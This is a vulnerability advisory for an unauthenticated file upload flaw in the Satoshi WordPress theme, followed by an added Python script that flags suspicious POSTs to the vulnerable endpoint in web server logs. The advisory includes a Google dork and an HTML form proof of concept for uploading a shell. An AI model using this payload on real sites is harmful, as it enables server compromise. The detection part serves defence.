Satoshi Theme - File Upload CSRF




#- Title: Satoshi Theme - File Upload CSRF
#- Author: Cyber_Taregh
#- Date: 2014-12-06
#- Developer : vooshtheme
#- Link Download : wpthemedownload .org/satoshi/
#- Google Dork: inurl:"/Themes/satoshi/"
#- Fixed in Version : -
#- Tested on : linux
======================================================


Classification

Type: CSRF
OWASP Top 10: A8: Cross-Site Request Forgery (CSRF)
CWE: CWE-352

Miscellaneous

Submitter: Anonymous
Views: 750
Verified: No
WPVDB ID: 7709

-- Proof Of Concept --

When vuln : -

CSRF : 


<form enctype="multipart/form-data"
action="http://target .com/wp-content/themes/satoshi/upload-file.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

If Success : Succes

Shell Path : Here
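
For site operators, an added detection sketch (not part of the original advisory): it scans web server access logs for POST requests to the theme's upload endpoint and labels each by where the request came from, since a forged cross-site form submission carries a foreign or missing Referer. The combined log format, the hostnames in SITE_HOSTS and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Endpoint path taken from the form action in the advisory above.
UPLOAD_PATH = "/wp-content/themes/satoshi/upload-file.php"
SITE_HOSTS = {"blog.example", "www.blog.example"}  # assumption: the site's own hostnames

# Apache/nginx "combined" log format.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def classify(line):
    """Return a finding dict for POSTs to the upload endpoint, else None."""
    m = LINE_RE.match(line)
    if not m or m["method"] != "POST":
        return None
    if urlsplit(m["target"]).path.lower() != UPLOAD_PATH:
        return None
    referer = m["referer"]
    ref_host = (urlsplit(referer).hostname or "") if referer not in ("", "-") else ""
    if not ref_host:
        origin = "no-referer"       # stripped Referer or direct script access
    elif ref_host in SITE_HOSTS:
        origin = "same-site"
    else:
        origin = "cross-site"       # form submitted from another origin
    return {"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            "origin": origin, "referer_host": ref_host}

def scan(lines):
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '203.0.113.7 - - [06/Dec/2014:10:01:02 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 7 "http://other.example/page.html" "Mozilla/5.0"',
    '198.51.100.4 - - [06/Dec/2014:10:05:40 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 7 "-" "curl/7.38.0"',
    '192.0.2.10 - - [06/Dec/2014:10:07:11 +0000] "GET /wp-content/themes/satoshi/style.css HTTP/1.1" 200 512 "http://blog.example/" "Mozilla/5.0"',
    '192.0.2.10 - - [06/Dec/2014:10:09:30 +0000] "POST /wp-content/themes/satoshi/upload-file.php?x=1 HTTP/1.1" 200 7 "http://blog.example/wp-admin/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Any 2xx finding labelled cross-site or no-referer is a reason to review what was written to the theme's upload directory. The Referer header is only a triage signal; the endpoint itself still needs an anti-CSRF token and an authorization check, or to be removed.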


